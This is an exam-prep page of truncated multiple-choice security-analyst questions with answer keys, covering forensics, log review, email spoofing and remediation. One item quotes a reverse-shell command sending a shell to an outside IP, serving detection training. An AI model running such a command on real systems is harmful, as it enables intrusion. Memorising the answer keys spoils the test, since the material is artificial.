- All Exams Instant Download
Which of the following must be collected first in a computer system, related to its volatility level?
During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level?A . Disk contentsB . Backup dataC . Temporary filesD . Running processesView AnswerAnswer: D Explanation: The most volatile type of evidence...
Which of the following has occurred?
The analyst reviews the following endpoint log entry: Which of the following has occurred?A . Registry changeB . Rename computerC . New account introducedD . Privilege escalationView AnswerAnswer: C Explanation: The endpoint log entry shows that a new account named “admin” has been created on a Windows system with a...
Which of the following types of media are most volatile and should be preserved?
A digital forensics investigator works from duplicate images to preserve the integrity of the original evidence. Which of the following types of media are most volatile and should be preserved? (Select two).A . Memory cacheB . Registry fileC . SSD storageD . Temporary filesystemsE . Packet decodingF . Swap volumeView...
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?
Which of the following will most likely ensure that mission-critical services are available in the event of an incident?A . Business continuity planB . Vulnerability management planC . Disaster recovery planD . Asset management planView AnswerAnswer: C Explanation:
Which of the following is being attempted?
A security analyst detects an exploit attempt containing the following command: sh -i >& /dev/udp/10.1.1.1/4821 0>$l Which of the following is being attempted?A . RCEB . Reverse shellC . XSSD . SQL injectionView AnswerAnswer: B Explanation: A reverse shell is a type of shell access that allows a remote user...
Which of the following actions should the technician take to accomplish this task?
A security technician is testing a solution that will prevent outside entities from spoofing the company's email domain, which is compatia.org. The testing is successful, and the security technician is prepared to fully implement the solution. Which of the following actions should the technician take to accomplish this task?A ....
method by which the security packages are delivered to the company's customers?
A company creates digitally signed packages for its devices. Which of the following best describes the method by which the security packages are delivered to the company's customers?A . Antitamper mechanismB . SELinuxC . Trusted firmware updatesD . eFuseView AnswerAnswer: C Explanation: Trusted firmware updates are a method by which...
Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent?
An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company...
Which of the following would be the best way to locate this issue?
During an audit, several customer order forms were found to contain inconsistencies between the actual price of an item and the amount charged to the customer. Further investigation narrowed the cause of the issue to manipulation of the public-facing web form used by customers to order products. Which of the...
Which of the following existing technical controls should a security analyst recommend to best meet all the requirements?
A Chief Information Officer wants to implement a BYOD strategy for all company laptops and mobile phones. The Chief Information Security Officer is concerned with ensuring all devices are patched and running some sort of protection against malicious software. Which of the following existing technical controls should a security analyst...
